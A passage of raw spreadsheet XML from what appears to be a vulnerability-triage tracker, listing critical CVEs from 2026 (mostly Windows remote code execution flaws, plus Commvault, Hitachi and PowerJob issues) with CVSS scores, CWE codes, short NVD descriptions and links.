t="inlineStr" /><c r="K78" s="5" t="inlineStr" /><c r="L78" s="5" t="inlineStr" /><c r="M78" s="5" t="inlineStr" /><c r="N78" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O78" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P78" s="5" t="inlineStr" /><c r="Q78" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R78" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t></is></c></row><row r="79"><c r="A79" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B79" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C79" s="5" t="inlineStr"><is><t>CVE-2026-69768</t></is></c><c r="D79" s="5" t="n"><v>9.800000000000001</v></c><c r="E79" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F79" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G79" s="5" t="inlineStr" /><c r="H79" s="5" t="n"><v>0.008999999999999999</v></c><c r="I79" s="5" t="inlineStr" /><c r="J79" s="5" t="inlineStr" /><c r="K79" s="5" t="inlineStr" /><c r="L79" s="5" t="inlineStr" /><c r="M79" s="5" t="inlineStr" /><c r="N79" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P79" s="5" t="inlineStr" /><c r="Q79" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R79" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t></is></c></row><row r="80"><c r="A80" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B80" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C80" s="5" t="inlineStr"><is><t>CVE-2026-69769</t></is></c><c r="D80" s="5" t="n"><v>9.800000000000001</v></c><c r="E80" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F80" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G80" s="5" t="inlineStr" /><c r="H80" s="5" t="n"><v>0.008999999999999999</v></c><c r="I80" s="5" t="inlineStr" /><c r="J80" s="5" t="inlineStr" /><c r="K80" s="5" t="inlineStr" /><c r="L80" s="5" t="inlineStr" /><c r="M80" s="5" t="inlineStr" /><c r="N80" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P80" s="5" t="inlineStr" /><c r="Q80" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R80" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S80" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t></is></c></row><row r="81"><c r="A81" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B81" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C81" s="5" t="inlineStr"><is><t>CVE-2026-69819</t></is></c><c r="D81" s="5" t="n"><v>9.800000000000001</v></c><c r="E81" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F81" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G81" s="5" t="inlineStr" /><c r="H81" s="5" t="n"><v>0.008999999999999999</v></c><c r="I81" s="5" t="inlineStr" /><c r="J81" s="5" t="inlineStr" /><c r="K81" s="5" t="inlineStr" /><c r="L81" s="5" t="inlineStr" /><c r="M81" s="5" t="inlineStr" /><c r="N81" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P81" s="5" t="inlineStr" /><c r="Q81" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R81" s="5" t="inlineStr"><is><t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S81" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t></is></c></row><row r="82"><c r="A82" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B82" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C82" s="5" t="inlineStr"><is><t>CVE-2026-69824</t></is></c><c r="D82" s="5" t="n"><v>9.800000000000001</v></c><c r="E82" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F82" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G82" s="5" t="inlineStr" /><c r="H82" s="5" t="n"><v>0.01</v></c><c r="I82" s="5" t="inlineStr" /><c r="J82" s="5" t="inlineStr" /><c r="K82" s="5" t="inlineStr" /><c r="L82" s="5" t="inlineStr" /><c r="M82" s="5" t="inlineStr" /><c r="N82" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P82" s="5" t="inlineStr" /><c r="Q82" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="R82" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S82" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t></is></c></row><row r="83"><c r="A83" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B83" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C83" s="5" t="inlineStr"><is><t>CVE-2026-69829</t></is></c><c r="D83" s="5" t="n"><v>9.800000000000001</v></c><c r="E83" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F83" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G83" s="5" t="inlineStr" /><c r="H83" s="5" t="n"><v>0.011</v></c><c r="I83" s="5" t="inlineStr" /><c r="J83" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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 s="5" t="inlineStr" /><c r="M83" s="5" t="inlineStr" /><c r="N83" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O83" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P83" s="5" t="inlineStr" /><c r="Q83" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R83" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S83" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t></is></c></row><row r="84"><c r="A84" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B84" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C84" s="5" t="inlineStr"><is><t>CVE-2026-69845</t></is></c><c r="D84" s="5" t="n"><v>9.800000000000001</v></c><c r="E84" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F84" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G84" s="5" t="inlineStr" /><c r="H84" s="5" t="n"><v>0.008999999999999999</v></c><c r="I84" s="5" t="inlineStr" /><c r="J84" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K84" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L84" s="5" t="inlineStr" /><c r="M84" s="5" t="inlineStr" /><c r="N84" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O84" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P84" s="5" t="inlineStr" /><c r="Q84" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R84" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S84" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t></is></c></row><row r="85"><c r="A85" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B85" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C85" s="5" t="inlineStr"><is><t>CVE-2026-69910</t></is></c><c r="D85" s="5" t="n"><v>9.800000000000001</v></c><c r="E85" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F85" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G85" s="5" t="inlineStr" /><c r="H85" s="5" t="n"><v>0.01</v></c><c r="I85" s="5" t="inlineStr" /><c r="J85" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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5" s="5" t="inlineStr" /><c r="M85" s="5" t="inlineStr" /><c r="N85" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O85" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P85" s="5" t="inlineStr" /><c r="Q85" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R85" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S85" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t></is></c></row><row r="86"><c r="A86" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B86" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C86" s="5" t="inlineStr"><is><t>CVE-2026-70296</t></is></c><c r="D86" s="5" t="n"><v>9.800000000000001</v></c><c r="E86" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F86" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G86" s="5" t="inlineStr" /><c r="H86" s="5" t="n"><v>0.01</v></c><c r="I86" s="5" t="inlineStr" /><c r="J86" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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6" s="5" t="inlineStr" /><c r="M86" s="5" t="inlineStr" /><c r="N86" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O86" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P86" s="5" t="inlineStr" /><c r="Q86" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R86" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S86" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t></is></c></row><row r="87"><c r="A87" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B87" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C87" s="5" t="inlineStr"><is><t>CVE-2026-71374</t></is></c><c r="D87" s="5" t="n"><v>9.800000000000001</v></c><c r="E87" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F87" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G87" s="5" t="inlineStr" /><c r="H87" s="5" t="n"><v>0.003</v></c><c r="I87" s="5" t="inlineStr" /><c r="J87" s="5" t="inlineStr" /><c r="K87" s="5" t="inlineStr" /><c r="L87" s="5" t="inlineStr" /><c r="M87" s="5" t="inlineStr" /><c r="N87" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P87" s="5" t="inlineStr" /><c r="Q87" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R87" s="5" t="inlineStr"><is><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S87" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t></is></c></row><row r="88"><c r="A88" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B88" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C88" s="5" t="inlineStr"><is><t>CVE-2026-71376</t></is></c><c r="D88" s="5" t="n"><v>9.800000000000001</v></c><c r="E88" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F88" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G88" s="5" t="inlineStr" /><c r="H88" s="5" t="n"><v>0.01</v></c><c r="I88" s="5" t="inlineStr" /><c r="J88" s="5" t="inlineStr" /><c r="K88" s="5" t="inlineStr" /><c r="L88" s="5" t="inlineStr" /><c r="M88" s="5" t="inlineStr" /><c r="N88" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O88" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P88" s="5" t="inlineStr" /><c r="Q88" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R88" s="5" t="inlineStr"><is><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S88" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t></is></c></row><row r="89"><c r="A89" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B89" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C89" s="5" t="inlineStr"><is><t>CVE-2026-71377</t></is></c><c r="D89" s="5" t="n"><v>9.800000000000001</v></c><c r="E89" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F89" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G89" s="5" t="inlineStr" /><c r="H89" s="5" t="n"><v>0.003</v></c><c r="I89" s="5" t="inlineStr" /><c r="J89" s="5" t="inlineStr" /><c r="K89" s="5" t="inlineStr" /><c r="L89" s="5" t="inlineStr" /><c r="M89" s="5" t="inlineStr" /><c r="N89" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O89" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P89" s="5" t="inlineStr" /><c r="Q89" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R89" s="5" t="inlineStr"><is><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is></c><c r="S89" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t></is></c></row><row r="90"><c r="A90" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B90" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C90" s="5" t="inlineStr"><is><t>CVE-2026-72979</t></is></c><c r="D90" s="5" t="n"><v>9.800000000000001</v></c><c r="E90" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F90" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G90" s="5" t="inlineStr" /><c r="H90" s="5" t="n"><v>0.01</v></c><c r="I90" s="5" t="inlineStr" /><c r="J90" s="5" t="inlineStr" /><c r="K90" s="5" t="inlineStr" /><c r="L90" s="5" t="inlineStr" /><c r="M90" s="5" t="inlineStr" /><c r="N90" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P90" s="5" t="inlineStr" /><c r="Q90" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R90" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S90" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t></is></c></row><row r="91"><c r="A91" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B91" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C91" s="5" t="inlineStr"><is><t>CVE-2026-72982</t></is></c><c r="D91" s="5" t="n"><v>9.800000000000001</v></c><c r="E91" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F91" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G91" s="5" t="inlineStr" /><c r="H91" s="5" t="n"><v>0.008999999999999999</v></c><c r="I91" s="5" t="inlineStr" /><c r="J91" s="5" t="inlineStr" /><c r="K91" s="5" t="inlineStr" /><c r="L91" s="5" t="inlineStr" /><c r="M91" s="5" t="inlineStr" /><c r="N91" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P91" s="5" t="inlineStr" /><c r="Q91" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R91" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S91" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t></is></c></row><row r="92"><c r="A92" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B92" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C92" s="5" t="inlineStr"><is><t>CVE-2026-72983</t></is></c><c r="D92" s="5" t="n"><v>9.800000000000001</v></c><c r="E92" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F92" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G92" s="5" t="inlineStr" /><c r="H92" s="5" t="n"><v>0.008999999999999999</v></c><c r="I92" s="5" t="inlineStr" /><c r="J92" s="5" t="inlineStr" /><c r="K92" s="5" t="inlineStr" /><c r="L92" s="5" t="inlineStr" /><c r="M92" s="5" t="inlineStr" /><c r="N92" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O92" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P92" s="5" t="inlineStr" /><c r="Q92" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R92" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S92" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t></is></c></row><row r="93"><c r="A93" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B93" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C93" s="5" t="inlineStr"><is><t>CVE-2026-73009</t></is></c><c r="D93" s="5" t="n"><v>9.800000000000001</v></c><c r="E93" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F93" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G93" s="5" t="inlineStr" /><c r="H93" s="5" t="n"><v>0.008999999999999999</v></c><c r="I93" s="5" t="inlineStr" /><c r="J93" s="5" t="inlineStr" /><c r="K93" s="5" t="inlineStr" /><c r="L93" s="5" t="inlineStr" /><c r="M93" s="5" t="inlineStr" /><c r="N93" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O93" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P93" s="5" t="inlineStr" /><c r="Q93" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R93" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S93" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t></is></c></row><row r="94"><c r="A94" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B94" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C94" s="5" t="inlineStr"><is><t>CVE-2026-73010</t></is></c><c r="D94" s="5" t="n"><v>9.800000000000001</v></c><c r="E94" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F94" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G94" s="5" t="inlineStr" /><c r="H94" s="5" t="n"><v>0.008999999999999999</v></c><c r="I94" s="5" t="inlineStr" /><c r="J94" s="5" t="inlineStr" /><c r="K94" s="5" t="inlineStr" /><c r="L94" s="5" t="inlineStr" /><c r="M94" s="5" t="inlineStr" /><c r="N94" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P94" s="5" t="inlineStr" /><c r="Q94" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R94" s="5" t="inlineStr"><is><t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S94" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t></is></c></row><row r="95"><c r="A95" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B95" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C95" s="5" t="inlineStr"><is><t>CVE-2026-73025</t></is></c><c r="D95" s="5" t="n"><v>9.800000000000001</v></c><c r="E95" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F95" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G95" s="5" t="inlineStr" /><c r="H95" s="5" t="n"><v>0.008999999999999999</v></c><c r="I95" s="5" t="inlineStr" /><c r="J95" s="5" t="inlineStr" /><c r="K95" s="5" t="inlineStr" /><c r="L95" s="5" t="inlineStr" /><c r="M95" s="5" t="inlineStr" /><c r="N95" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O95" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P95" s="5" t="inlineStr" /><c r="Q95" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="R95" s="5" t="inlineStr"><is><t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S95" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t></is></c></row><row r="96"><c r="A96" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B96" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C96" s="5" t="inlineStr"><is><t>CVE-2026-75430</t></is></c><c r="D96" s="5" t="n"><v>9.800000000000001</v></c><c r="E96" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F96" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G96" s="5" t="inlineStr" /><c r="H96" s="5" t="n"><v>0.008999999999999999</v></c><c r="I96" s="5" t="inlineStr" /><c r="J96" s="5" t="inlineStr" /><c r="K96" s="5" t="inlineStr" /><c r="L96" s="5" t="inlineStr" /><c r="M96" s="5" t="inlineStr" /><c r="N96" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O96" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P96" s="5" t="inlineStr" /><c r="Q96" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R96" s="5" t="inlineStr"><is><t>PowerJob Worker version 5.1.2 (and likely earlier versions) exposes the /worker/deployContainer HTTP endpoint without authentication on the default transport port. This allows a remote attacker to execute arbitrary code.</t></is></c><c r="S96" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75430</t></is></c></row><row r="97"><c r="A97" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B97" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C97" s="5" t="inlineStr"><is><t>CVE-2026-75816</t></is></c><c r="D97" s="5" t="n"><v>9.800000000000001</v></c><c r="E97" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F97" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G97" s="5" t="inlineStr" /><c r="H97" s="5" t="n"><v>0.005</v></c><c r="I97" s="5" t="inlineStr" /><c r="J97" s="5" t="inlineStr" /><c r="K97" s="5" t="inlineStr" /><c r="L97" s="5" t="inlineStr" /><c r="M97" s="5" t="inlineStr" /><c r="N97" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O97" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P97" s="5" t="inlineStr" /><c r="Q97" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R97" s="5" t="inlineStr"><is><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is></c><c r="S97" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75816</t></is></c></row><row r="98"><c r="A98" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B98" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C98" s="5" t="inlineStr"><is><t>CVE-2026-77089</t></is></c><c r="D98" s="5" t="n"><v>9.800000000000001</v></c><c r="E98" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F98" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G98" s="5" t="inlineStr" /><c r="H98" s="5" t="n"><v>0.003</v></c><c r="I98" s="5" t="inlineStr" /><c r="J98" s="5" t="inlineStr" /><c r="K98" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L98" s="5" t="inlineStr" /><c r="M98" s="5" t="inlineStr" /><c r="N98" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O98" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P98" s="5" t="inlineStr" /><c r="Q98" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="R98" s="5" t="inlineStr"><is><t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t></is></c><c r="S98" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t></is></c></row><row r="99"><c r="A99" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B99" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C99" s="5" t="inlineStr"><is><t>CVE-2026-77092</t></is></c><c r="D99" s="5" t="n"><v>9.800000000000001</v></c><c r="E99" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F99" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G99" s="5" t="inlineStr" /><c r="H99" s="5" t="n"><v>0.002</v></c><c r="I99" s="5" t="inlineStr" /><c r="J99" s="5" t="inlineStr" /><c r="K99" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L99" s="5" t="inlineStr" /><c r="M99" s="5" t="inlineStr" /><c r="N99" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P99" s="5" t="inlineStr" /><c r="Q99" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R99" s="5" t="inlineStr"><is><t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t></is></c><c r="S99" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t></is></c></row><row r="100"><c r="A100" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C100" s="5" t="inlineStr"><is><t>CVE-2026-77098</t></is></c><c r="D100" s="5" t="n"><v>9.800000000000001</v></c><c r="E100" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G100" s="5" t="inlineStr" /><c r="H100" s="5" t="n"><v>0.003</v></c><c r="I100" s="5" t="inlineStr" /><c r="J100" s="5" t="inlineStr" /><c r="K100" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L100" s="5" t="inlineStr" /><c r="M100" s="5" t="inlineStr" /><c r="N100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P100" s="5" t="inlineStr" /><c r="Q100" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R100" s="5" t="inlineStr"><is><t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="S100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t></is></c></row><row r="101"><c r="A101" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C101" s="5" t="inlineStr"><is><t>CVE-2026-77493</t></is></c><c r="D101" s="5" t="n"><v>9.800000000000001</v></c><c r="E101" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F101" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G101" s="5" t="inlineStr" /><c r="H101" s="5" t="n"><v>0.01</v></c><c r="I101" s="5" t="inlineStr" /><c r="J101" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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1" s="5" t="inlineStr" /><c r="M101" s="5" t="inlineStr" /><c r="N101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P101" s="5" t="inlineStr" /><c r="Q101" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R101" s="5" t="inlineStr"><is><t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t></is></c></row><row r="102"><c r="A102" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B102" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C102" s="5" t="inlineStr"><is><t>CVE-2026-77647</t></is></c><c r="D102" s="5" t="n"><v>9.800000000000001</v></c><c r="E102" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F102" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G102" s="5" t="inlineStr" /><c r="H102" s="5" t="n"><v>0.026</v></c><c r="I102" s="5" t="inlineStr" /><c r="J102" s="5" t="inlineStr" /><c r="K102" s="5" t="inlineStr" /><c r="L102" s="5" t="inlineStr" /><c r="M102" s="5" t="inlineStr" /><c r="N102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O102" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P102" s="5" t="inlineStr" /><c r="Q102" s="5" 